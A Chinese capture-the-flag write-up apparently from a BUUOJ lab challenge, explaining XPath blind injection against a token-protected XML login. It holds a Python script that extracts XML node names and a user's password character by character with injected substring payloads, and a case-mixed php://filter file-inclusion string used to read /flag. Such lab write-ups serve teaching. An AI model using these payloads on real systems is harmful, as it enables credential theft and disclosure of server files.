考点为xpath注入.
打开页面是个登录框,用户名密码随意输了一下,点击登录显示登录超时请刷新页面,f12可以看到用了token,更新的速度挺快的.刷新后登录,抓包,发现是login.php,并且用到了xml.尝试xxe发现不可行,要用xpath盲注.xpath注入详解
尝试注入发现若语句为真则显示非法操作,为假则显示用户名或密码错误.
上脚本:
import requests def req(username): import re url = 'http://0a92d237-bdc8-443b-ae58-0693cf408aac.node3.buuoj.cn/login.php' password = '' s = requests.session() r = s.get(url).content re = re.search(r'value="(.*?)" />', r.decode('utf-8')) token = re.group(0)[7:-4] headers = { 'Content-Type': 'application/xml', } data = '<username>'+username+'</username>''<password>'+password+'</password>''<token>'+token+'</token>' r = s.post(url,data=data,headers=headers).content if '非法操作' in r.decode('utf-8'): return 1 else: return 0 flag = '' for i in range(1,50): print(i) for j in range(32,127): #username = "' or substring(name(/*[1]),{},1)='{}' or '1".format(i,chr(j)) #username = "' or substring(name(/root/*[1]),{},1)='{}' or '1".format(i,chr(j)) #username = "' or substring(name(/root/accounts/*[1]),{},1)='{}' or '1".format(i,chr(j)) #username = "' or substring(name(/root/accounts/user/*[1]),{},1)='{}' or '1".format(i, chr(j)) #username = "' or substring(name(/root/accounts/user/*[2]),{},1)='{}' or '1".format(i, chr(j)) #username = "' or substring(name(/root/accounts/user/*[3]),{},1)='{}' or '1".format(i, chr(j)) #username = "' or substring(/root/accounts/user[1]/username,{},1)='{}' or '1".format(i, chr(j)) #username = "' or substring(/root/accounts/user[2]/username,{},1)='{}' or '1".format(i, chr(j)) username = "' or substring(/root/accounts/user[2]/password,{},1)='{}' or '1".format(i,chr(j)) if req(username) == 1: flag += chr(j) print(flag) break
拿到账号和密码后登录,注意到url处?file=welcome
,f12后看到ZmxhZyBpcyBpbiAvZmxhZwo=
,base64解码后得知flag在/flag,用文件包含,过滤了php和base,大小写绕过:
pHp://filter/convert.Base64-encode/resource=/flag
,f12看到一串base64编码的字符串,解码得flag.
No responses yet